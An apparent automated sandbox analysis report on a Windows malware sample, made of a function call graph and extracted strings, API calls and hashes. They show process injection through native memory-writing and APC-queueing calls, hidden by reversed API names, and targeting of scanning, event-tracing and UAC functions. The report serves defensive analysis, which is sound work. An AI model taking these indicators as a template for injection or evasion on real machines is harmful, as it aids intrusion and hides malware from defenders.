2d68615 28452->28455 28460 2d69499 28453->28460 28461 2d66334 28454->28461 28458 2d68641 28455->28458 28457 2d589d0 4 API calls 28456->28457 28467 2d67afa 28457->28467 28459 2d68678 28458->28459 28462 2d589d0 4 API calls 28459->28462 28463 2d589d0 4 API calls 28460->28463 28464 2d589d0 4 API calls 28461->28464 28465 2d68691 28462->28465 28478 2d69515 28463->28478 28471 2d663b0 28464->28471 28466 2d686bd 28465->28466 28469 2d686e0 28466->28469 28468 2d589d0 4 API calls 28467->28468 28480 2d67b9d 28468->28480 28470 2d6876e 28469->28470 28473 2d686f2 28469->28473 28475 2d6878f 28470->28475 28472 2d589d0 4 API calls 28471->28472 28486 2d6642c 28472->28486 28477 2d6871e 28473->28477 28474 2d69cf5 28476 2d589d0 4 API calls 28474->28476 28483 2d687a7 28475->28483 28489 2d69d71 28476->28489 28481 2d68755 28477->28481 28478->28474 28479 2d589d0 4 API calls 28478->28479 28492 2d695bb 28479->28492 28482 2d589d0 4 API calls 28480->28482 28484 2d589d0 4 API calls 28481->28484 28495 2d67c19 28482->28495 28485 2d589d0 4 API calls 28483->28485 28484->28470 28488 2d687ea 28485->28488 28487 2d589d0 4 API calls 28486->28487 28491 2d664a8 28487->28491 28497 2d68823 28488->28497 28490 2d589d0 4 API calls 28489->28490 28500 2d69ded 28490->28500 28888 2d585bc GetModuleHandleA GetProcAddress 28491->28888 28493 2d589d0 4 API calls 28492->28493 28502 2d69637 28493->28502 28496 2d589d0 4 API calls 28495->28496 28507 2d67c95 28496->28507 28498 2d589d0 4 API calls 28497->28498 28499 2d68866 28498->28499 28511 2d688b9 28499->28511 28501 2d589d0 4 API calls 28500->28501 28506 2d69e69 28501->28506 28504 2d589d0 4 API calls 28502->28504 28503 2d664e6 28505 2d589d0 4 API calls 28503->28505 28522 2d696b3 28504->28522 28516 2d66562 28505->28516 28508 2d589d0 4 API calls 28506->28508 28509 2d589d0 4 API calls 28507->28509 28510 2d69e9c 28508->28510 28519 2d67d30 28509->28519 28512 2d589d0 4 API calls 28510->28512 28513 2d589d0 4 API calls 28511->28513 28515 2d69ecf 28512->28515 28514 2d68914 28513->28514 28524 2d68935 28514->28524 28518 2d589d0 4 API calls 28515->28518 28517 2d589d0 4 API calls 28516->28517 28527 2d665de 28517->28527 28520 2d69f02 28518->28520 28521 2d589d0 4 API calls 28519->28521 28523 2d589d0 4 API calls 28520->28523 28529 2d67dac 28521->28529 28525 2d589d0 4 API calls 28522->28525 28531 2d69f35 28523->28531 28526 2d589d0 4 API calls 28524->28526 28533 2d6978a 28525->28533 28535 2d68990 28526->28535 28528 2d589d0 4 API calls 28527->28528 28539 2d6665a 28528->28539 28530 2d589d0 4 API calls 28529->28530 28546 2d67e28 28530->28546 28532 2d589d0 4 API calls 28531->28532 28541 2d69fb1 28532->28541 28534 2d589d0 4 API calls 28533->28534 28543 2d69806 28534->28543 28536 2d589d0 4 API calls 28535->28536 28537 2d68a0c 28536->28537 28834 2d5d164 28537->28834 28540 2d589d0 4 API calls 28539->28540 28552 2d666d6 28540->28552 28542 2d589d0 4 API calls 28541->28542 28556 2d6a02d 28542->28556 28544 2d589d0 4 API calls 28543->28544 28614 2d69aa9 28543->28614 28559 2d69894 28544->28559 28545 2d589d0 4 API calls 28558 2d69b6b 28545->28558 28548 2d589d0 4 API calls 28546->28548 28547 2d68a20 28549 2d589d0 4 API calls 28547->28549 28550 2d67ee5 28548->28550 28562 2d68aa1 28549->28562 28890 2d57e50 GetModuleHandleA GetProcAddress 28550->28890 28551 2d668db 28555 2d589d0 4 API calls 28551->28555 28552->28551 28553 2d589d0 4 API calls 28552->28553 28569 2d66767 28553->28569 28567 2d669c5 28555->28567 28557 2d589d0 4 API calls 28556->28557 28561 2d6a0a9 28557->28561 28560 2d589d0 4 API calls 28558->28560 28563 2d589d0 4 API calls 28559->28563 28576 2d69be7 28560->28576 28565 2d589d0 4 API calls 28561->28565 28564 2d589d0 4 API calls 28562->28564 28575 2d69910 28563->28575 28577 2d68b1d 28564->28577 28568 2d6a0dc 28565->28568 28566 2d67f08 28570 2d589d0 4 API calls 28566->28570 28571 2d589d0 4 API calls 28567->28571 28573 2d589d0 4 API calls 28568->28573 28572 2d589d0 4 API calls 28569->28572 28587 2d67f84 28570->28587 28588 2d66a41 28571->28588 28586 2d667e3 28572->28586 28574 2d6a10f 28573->28574 28580 2d589d0 4 API calls 28574->28580 28578 2d589d0 4 API calls 28575->28578 28579 2d589d0 4 API calls 28576->28579 28581 2d589d0 4 API calls 28577->28581 28599 2d6998c 28578->28599 28594 2d69c63 28579->28594 28583 2d6a142 28580->28583 28582 2d68b99 28581->28582 28596 2d68bb9 28582->28596 28882 2d58730 28582->28882 28585 2d589d0 4 API calls 28583->28585 28592 2d6a175 28585->28592 28590 2d589d0 4 API calls 28586->28590 28591 2d589d0 4 API calls 28587->28591 28589 2d589d0 4 API calls 28588->28589 28604 2d66abd 28589->28604 28602 2d6685f 28590->28602 28603 2d68000 28591->28603 28593 2d589d0 4 API calls 28592->28593 28608 2d6a1a8 28593->28608 28595 2d589d0 4 API calls 28594->28595 28597 2d69cdf 28595->28597 28598 2d589d0 4 API calls 28596->28598 28896 2d58d70 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28597->28896 28610 2d68c35 28598->28610 28601 2d589d0 4 API calls 28599->28601 28612 2d69a2d 28601->28612 28605 2d589d0 4 API calls 28602->28605 28606 2d589d0 4 API calls 28603->28606 28607 2d589d0 4 API calls 28604->28607 28605->28551 28615 2d6807c 28606->28615 28616 2d66b39 28607->28616 28609 2d589d0 4 API calls 28608->28609 28622 2d6a224 28609->28622 28611 2d589d0 4 API calls 28610->28611 28624 2d68cb1 28611->28624 28613 2d589d0 4 API calls 28612->28613 28613->28614 28614->28545 28617 2d589d0 4 API calls 28615->28617 28618 2d589d0 4 API calls 28616->28618 28619 2d680f8 28617->28619 28628 2d66bb5 28618->28628 28891 2d5b118 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28619->28891 28621 2d68109 28621->27729 28623 2d589d0 4 API calls 28622->28623 28626 2d6a2a0 28623->28626 28625 2d589d0 4 API calls 28624->28625 28630 2d68d2d 28625->28630 28627 2d589d0 4 API calls 28626->28627 28631 2d6a2d3 28627->28631 28629 2d589d0 4 API calls 28628->28629 28634 2d66c31 28629->28634 28632 2d589d0 4 API calls 28630->28632 28633 2d589d0 4 API calls 28631->28633 28636 2d68db4 28632->28636 28637 2d6a34f 28633->28637 28635 2d589d0 4 API calls 28634->28635 28640 2d66cad 28635->28640 28638 2d589d0 4 API calls 28636->28638 28639 2d589d0 4 API calls 28637->28639 28642 2d68e30 28638->28642 28643 2d6a3cb 28639->28643 28641 2d589d0 4 API calls 28640->28641 28651 2d66d48 28641->28651 28644 2d589d0 4 API calls 28642->28644 28645 2d589d0 4 API calls 28643->28645 28650 2d68eac 28644->28650 28646 2d6a447 28645->28646 28647 2d589d0 4 API calls 28646->28647 28648 2d6a47a 28647->28648 28649 2d589d0 4 API calls 28648->28649 28653 2d6a4ad 28649->28653 28652 2d589d0 4 API calls 28650->28652 28655 2d589d0 4 API calls 28651->28655 28658 2d68f33 28652->28658 28654 2d589d0 4 API calls 28653->28654 28656 2d6a4e0 28654->28656 28660 2d66e43 28655->28660 28657 2d589d0 4 API calls 28656->28657 28662 2d6a513 28657->28662 28659 2d589d0 4 API calls 28658->28659 28664 2d68faf 28659->28664 28661 2d589d0 4 API calls 28660->28661 28668 2d66ebf 28661->28668 28663 2d589d0 4 API calls 28662->28663 28666 2d6a58f 28663->28666 28665 2d589d0 4 API calls 28664->28665 28671 2d6902b 28665->28671 28667 2d589d0 4 API calls 28666->28667 28670 2d6a60b 28667->28670 28669 2d589d0 4 API calls 28668->28669 28676 2d66f77 28669->28676 28672 2d589d0 4 API calls 28670->28672 28673 2d589d0 4 API calls 28671->28673 28674 2d6a63e 28672->28674 28680 2d690a7 28673->28680 28675 2d589d0 4 API calls 28674->28675 28677 2d6a671 28675->28677 28678 2d589d0 4 API calls 28676->28678 28679 2d589d0 4 API calls 28677->28679 28684 2d66ff3 28678->28684 28682 2d6a6a4 28679->28682 28681 2d589d0 4 API calls 28680->28681 28687 2d69123 28681->28687 28683 2d589d0 4 API calls 28682->28683 28685 2d6a6d7 28683->28685 28684->27729 28686 2d589d0 4 API calls 28685->28686 28689 2d6a70a 28686->28689 28688 2d589d0 4 API calls 28687->28688 28691 2d6919f 28688->28691 28690 2d589d0 4 API calls 28689->28690 28699 2d6a786 28690->28699 28692 2d589d0 4 API calls 28691->28692 28693 2d6921b 28692->28693 28892 2d5894c 28693->28892 28695 2d6923a 28696 2d5894c 3 API calls 28695->28696 28697 2d6924e 28696->28697 28698 2d5894c 3 API calls 28697->28698 28700 2d69262 28698->28700 28702 2d589d0 4 API calls 28699->28702 28701 2d5894c 3 API calls 28700->28701 28703 2d69276 28701->28703 28707 2d6a802 28702->28707 28704 2d5894c 3 API calls 28703->28704 28705 2d6928a 28704->28705 28706 2d5894c 3 API calls 28705->28706 28709 2d6929e 28706->28709 28708 2d589d0 4 API calls 28707->28708 28711 2d6a87e 28708->28711 28710 2d589d0 4 API calls 28709->28710 28713 2d69325 28710->28713 28712 2d589d0 4 API calls 28711->28712 28715 2d6a8fa 28712->28715 28714 2d589d0 4 API calls 28713->28714 28714->28440 28716 2d589d0 4 API calls 28715->28716 28717 2d6a976 28716->28717 28718 2d589d0 4 API calls 28717->28718 28719 2d6a985 28718->28719 28720 2d589d0 4 API calls 28719->28720 28721 2d6a994 28720->28721 28722 2d589d0 4 API calls 28721->28722 28723 2d6a9a3 28722->28723 28724 2d589d0 4 API calls 28723->28724 28725 2d6a9b2 28724->28725 28726 2d589d0 4 API calls 28725->28726 28727 2d6a9c1 28726->28727 28728 2d589d0 4 API calls 28727->28728 28729 2d6a9d0 28728->28729 28730 2d589d0 4 API calls 28729->28730 28731 2d6a9df 28730->28731 28732 2d589d0 4 API calls 28731->28732 28733 2d6a9ee 28732->28733 28734 2d589d0 4 API calls 28733->28734 28735 2d6a9fd 28734->28735 28736 2d589d0 4 API calls 28735->28736 28737 2d6aa0c 28736->28737 28738 2d589d0 4 API calls 28737->28738 28739 2d6aa1b 28738->28739 28740 2d589d0 4 API calls 28739->28740 28741 2d6aa2a 28740->28741 28742 2d589d0 4 API calls 28741->28742 28743 2d6aa39 28742->28743 28744 2d589d0 4 API calls 28743->28744 28745 2d6aa48 28744->28745 28746 2d589d0 4 API calls 28745->28746 28747 2d6aa57 28746->28747 28748 2d589d0 4 API calls 28747->28748 28749 2d6aad3 28748->28749 28750 2d589d0 4 API calls 28749->28750 28751 2d6ab06 28750->28751 28752 2d589d0 4 API calls 28751->28752 28753 2d6ab39 28752->28753 28754 2d589d0 4 API calls 28753->28754 28755 2d6ab6c 28754->28755 28756 2d589d0 4 API calls 28755->28756 28757 2d6ab9f 28756->28757 28758 2d589d0 4 API calls 28757->28758 28759 2d6abd2 28758->28759 28760 2d589d0 4 API calls 28759->28760 28761 2d6ac05 28760->28761 28762 2d589d0 4 API calls 28761->28762 28763 2d6ac38 28762->28763 28764 2d589d0 4 API calls 28763->28764 28765 2d6acb4 28764->28765 28766 2d589d0 4 API calls 28765->28766 28767 2d6ad30 28766->28767 28768 2d589d0 4 API calls 28767->28768 28769 2d6adac 28768->28769 28770 2d589d0 4 API calls 28769->28770 28771 2d6addf 28770->28771 28772 2d589d0 4 API calls 28771->28772 28773 2d6ae12 28772->28773 28774 2d589d0 4 API calls 28773->28774 28775 2d6ae45 28774->28775 28776 2d589d0 4 API calls 28775->28776 28777 2d6ae78 28776->28777 28778 2d589d0 4 API calls 28777->28778 28779 2d6aeab 28778->28779 28780 2d589d0 4 API calls 28779->28780 28781 2d6aede 28780->28781 28782 2d589d0 4 API calls 28781->28782 28783 2d6af11 28782->28783 28784 2d589d0 4 API calls 28783->28784 28785 2d6af44 28784->28785 28786 2d589d0 4 API calls 28785->28786 28787 2d6af77 28786->28787 28788 2d589d0 4 API calls 28787->28788 28789 2d6afaa 28788->28789 28790 2d589d0 4 API calls 28789->28790 28791 2d6afdd 28790->28791 28792 2d589d0 4 API calls 28791->28792 28793 2d6b010 28792->28793 28794 2d589d0 4 API calls 28793->28794 28795 2d6b043 28794->28795 28796 2d589d0 4 API calls 28795->28796 28797 2d6b076 28796->28797 28798 2d589d0 4 API calls 28797->28798 28799 2d6b0a9 28798->28799 28800 2d589d0 4 API calls 28799->28800 28801 2d6b0dc 28800->28801 28802 2d589d0 4 API calls 28801->28802 28803 2d6b10f 28802->28803 28804 2d589d0 4 API calls 28803->28804 28805 2d6b142 28804->28805 28806 2d589d0 4 API calls 28805->28806 28807 2d6b175 28806->28807 28897 2d58338 28807->28897 28809 2d6b184 28810 2d589d0 4 API calls 28809->28810 28811 2d6b200 28810->28811 28812 2d589d0 4 API calls 28811->28812 28813 2d6b27c 28812->28813 28814 2d589d0 4 API calls 28813->28814 28814->28815 28817 2d588c6 28816->28817 28904 2d58274 28817->28904 28819 2d588f1 28908 2d57d78 28819->28908 28821 2d5891f 28821->27733 28823 2d589e4 28822->28823 28824 2d581cc 2 API calls 28823->28824 28825 2d58a1d 28824->28825 28826 2d58274 GetProcAddress 28825->28826 28827 2d58a36 28826->28827 28828 2d57d78 3 API calls 28827->28828 28829 2d58a95 28828->28829 28830 2d58338 3 API calls 28829->28830 28831 2d58aa4 28830->28831 28831->27738 28833 2d44871 28832->28833 28835 2d5d16d 28834->28835 28836 2d589d0 4 API calls 28835->28836 28837 2d5d1ef 28836->28837 28838 2d589d0 4 API calls 28837->28838 28839 2d5d248 28838->28839 28840 2d589d0 4 API calls 28839->28840 28841 2d5d2a1 28840->28841 28842 2d589d0 4 API calls 28841->28842 28843 2d5d2fa 28842->28843 28844 2d589d0 4 API calls 28843->28844 28845 2d5d353 28844->28845 28846 2d589d0 4 API calls 28845->28846 28847 2d5d3ac 28846->28847 28848 2d589d0 4 API calls 28847->28848 28849 2d5d405 28848->28849 28850 2d589d0 4 API calls 28849->28850 28851 2d5d470 28850->28851 28852 2d589d0 4 API calls 28851->28852 28853 2d5d4e1 28852->28853 28854 2d5d558 28853->28854 28856 2d589d0 4 API calls 28853->28856 28855 2d589d0 4 API calls 28854->28855 28857 2d5d5c9 28855->28857 28856->28854 28858 2d589d0 4 API calls 28857->28858 28859 2d5d63a 28858->28859 28860 2d589d0 4 API calls 28859->28860 28861 2d5d6ab 28860->28861 28862 2d589d0 4 API calls 28861->28862 28863 2d5d735 28862->28863 28864 2d589d0 4 API calls 28863->28864 28865 2d5d7a6 28864->28865 28920 2d57a2c 28865->28920 28867 2d5d7be 28868 2d5d835 28867->28868 28870 2d589d0 4 API calls 28867->28870 28869 2d589d0 4 API calls 28868->28869 28871 2d5d8a6 28869->28871 28870->28868 28872 2d589d0 4 API calls 28871->28872 28873 2d5d917 28872->28873 28874 2d57d78 3 API calls 28873->28874 28875 2d5d92f 28874->28875 28876 2d589d0 4 API calls 28875->28876 28877 2d5d9a0 28876->28877 28878 2d589d0 4 API calls 28877->28878 28879 2d5da11 28878->28879 28880 2d589d0 4 API calls 28879->28880 28881 2d5da82 28880->28881 28881->28547 28883 2d581cc 2 API calls 28882->28883 28884 2d58742 28883->28884 28885 2d58274 GetProcAddress 28884->28885 28886 2d58748 NtQueueApcThread 28885->28886 28886->28596 28887->28377 28888->28503 28889->28436 28890->28566 28891->28621 28893 2d58965 28892->28893 28894 2d57d78 3 API calls 28893->28894 28895 2d589a5 28893->28895 28894->28895 28895->28695 28896->28474 28898 2d5835b 28897->28898 28899 2d581cc 2 API calls 28898->28899 28900 2d5838d 28899->28900 28901 2d58274 GetProcAddress 28900->28901 28902 2d58393 FlushInstructionCache 28901->28902 28903 2d583c1 28902->28903 28903->28809 28905 2d58299 28904->28905 28906 2d582cc GetProcAddress 28905->28906 28907 2d582fb 28906->28907 28907->28819 28909 2d57d9d 28908->28909 28915 2d581cc 28909->28915 28911 2d57dcd 28912 2d58274 GetProcAddress 28911->28912 28913 2d57dd3 NtWriteVirtualMemory 28912->28913 28914 2d57e0c 28913->28914 28914->28821 28916 2d581ef 28915->28916 28917 2d58274 GetProcAddress 28916->28917 28918 2d58215 GetModuleHandleA 28917->28918 28919 2d5823b 28918->28919 28919->28911 28921 2d57a34 28920->28921 28922 2d581cc 2 API calls 28921->28922 28923 2d57a7e 28922->28923 28924 2d58274 GetProcAddress 28923->28924 28925 2d57a84 NtAllocateVirtualMemory 28924->28925 28926 2d57ac2 28925->28926 28926->28867

                                          Executed Functions

                                          Function 02D5F7C8 Relevance: 156.6, Strings: 118, Instructions: 9071COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: /d $ /o$.url$<h$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                          • API String ID: 0-4272354979
                                          • Opcode ID: efb3238ac650951520d69ced458316179f023e9969ef250b039c77ad03118442
                                          • Instruction ID: 6d8385d225f72c2d34dd9dd3ce0e510ac52fff8e2e4b5ece6e61730a805f7c9b
                                          • Opcode Fuzzy Hash: efb3238ac650951520d69ced458316179f023e9969ef250b039c77ad03118442
                                          • Instruction Fuzzy Hash: E714EB74A0429D9FDB10EBA4DC85BDE73BAEF85304F5080E69409EB314DE30AE959F61
                                          Function 02D57A2A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D57A9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                          • API String ID: 421316089-445027087
                                          • Opcode ID: 9c8cf44444ee439574f3b0befd28e264a27341bcb24a2686eff3c9cf509d2801
                                          • Instruction ID: d76f805af0d3028535ca9975dfa2bebc19c1a5fb0645ac100d47c9f604cca246
                                          • Opcode Fuzzy Hash: 9c8cf44444ee439574f3b0befd28e264a27341bcb24a2686eff3c9cf509d2801
                                          • Instruction Fuzzy Hash: D111F375644209BFEB04EFA4EC41EAABBAEEB48700F604464B904D7740DAB0AE548F64
                                          Function 02D57A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D57A9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                          • API String ID: 421316089-445027087
                                          • Opcode ID: e43665b48a1c76d1b0c9c1b502efdd99b7023719a0d3e1110483d06fc543ec09
                                          • Instruction ID: 247a5a700675a5a2896fe19a6cb1640dff63ab9403e4d070ba1b9b446412909c
                                          • Opcode Fuzzy Hash: e43665b48a1c76d1b0c9c1b502efdd99b7023719a0d3e1110483d06fc543ec09
                                          • Instruction Fuzzy Hash: 3D110575644209BFEB04EFA4EC41F9ABBAEEB48700F604464B904D7740DAB0AE548F74
                                          Function 02D57AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 11500 2d57ac9 11501 2d57a56 11500->11501 11502 2d57a34-2d57a54 call 2d44530 11501->11502 11503 2d57a58-2d57ac2 call 2d5798c call 2d447ec call 2d449a0 call 2d581cc call 2d58274 NtAllocateVirtualMemory call 2d44500 11501->11503 11502->11501
                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D57A9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                          • API String ID: 2167126740-445027087
                                          • Opcode ID: 472a85a54814839b50b34893d066e1a21c1784187c8f66c623746c60d727451e
                                          • Instruction ID: 35f7eb7445085449c230ae6651e20f4e9de5061b09ce5a0a5991b7c7848e67cf
                                          • Opcode Fuzzy Hash: 472a85a54814839b50b34893d066e1a21c1784187c8f66c623746c60d727451e
                                          • Instruction Fuzzy Hash: 18011775644219AFFF04EFA4EC51EAEBBADEB48700F604864BD18D7700DA70AE548F64
                                          Function 02D57D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D57DEC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressHandleMemoryModuleProcVirtualWrite
                                          • String ID: Ntdll$yromeMlautriVetirW
                                          • API String ID: 4260932595-3542721025
                                          • Opcode ID: 45f06e40d182fa2d38eb6a632028f31fb5a90a36bac869e92faf646467c9f495
                                          • Instruction ID: a3070bd66b8a7593bdba0fe2e4804fa2722db1886392e19f54e3dc3f97ca8749
                                          • Opcode Fuzzy Hash: 45f06e40d182fa2d38eb6a632028f31fb5a90a36bac869e92faf646467c9f495
                                          • Instruction Fuzzy Hash: BA010C7564021AAFEF00EF98EC41E9ABBEEEB89700F604850BD04D7740DA70AD558F74
                                          Function 02D58730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21nativethreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 11533 2d58730-2d58768 call 2d581cc call 2d58274 NtQueueApcThread
                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02D58761
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressHandleModuleProcQueueThread
                                          • String ID: NtQueueApcThread$ntdll
                                          • API String ID: 1843393797-1374908105
                                          • Opcode ID: 5c6abb26e7e14e61697151b2b8c1b43cb0526aa8d930c279f992bbbbe10c5e5c
                                          • Instruction ID: 2b8629e37c5dfbea1489f5a5ddaac7151b9463796c46048de5a3438d15903d30
                                          • Opcode Fuzzy Hash: 5c6abb26e7e14e61697151b2b8c1b43cb0526aa8d930c279f992bbbbe10c5e5c
                                          • Instruction Fuzzy Hash: 70E026B278021AAF9F40EED9E845D8B7BECAB09650B044401FE19D7301C6B4ED609F71
                                          Function 02D5DD70 Relevance: .1, Instructions: 80COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 586fd806b080057bb9b7d35fbacb1c00cdf25cd9f34876aeb7ebb04196180134
                                          • Instruction ID: a332d7ea242f086514b8fb752eea7625be3fd2dbcad72bc3a8f3a39c0dd6a387
                                          • Opcode Fuzzy Hash: 586fd806b080057bb9b7d35fbacb1c00cdf25cd9f34876aeb7ebb04196180134
                                          • Instruction Fuzzy Hash: 8021C071A40618BBEB51EA94CC52FDE77BEEB48700F500465B601E72C0EAB4AE449B75

                                          Non-executed Functions

                                          Function 02D58338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 02D581CC: GetModuleHandleA.KERNELBASE(?), ref: 02D5821E
                                            • Part of subcall function 02D58274: GetProcAddress.KERNEL32(?,?,00000000,Kernel32,00000000,00000000,02D582FC,?,?,00000000,00000000,?,02D58215,00000000,KernelBASE,00000000), ref: 02D582D9
                                          • FlushInstructionCache.KERNEL32(?,?,?), ref: 02D583A4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.447688502.0000000002D41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_2d41000_Qzzgbhha.jbxd
                                          Similarity
                                          • API ID: AddressCacheFlushHandleInstructionModuleProc
                                          • String ID: FlushInstructionCache$Kernel32
                                          • API String ID: 2392256011-184458249
                                          • Opcode ID: d1ad3025a4ace2a9e1f0396c77b58926a4f403ce4bbb68010056d7f9986c0553
                                          • Instruction ID: 22fda65ad4d774d6291eab55e8ab995605aff32f14a0271e2127ca891f16a154
                                          • Opcode Fuzzy Hash: d1ad3025a4ace2a9e1f0396c77b58926a4f403ce4bbb68010056d7f9986c0553
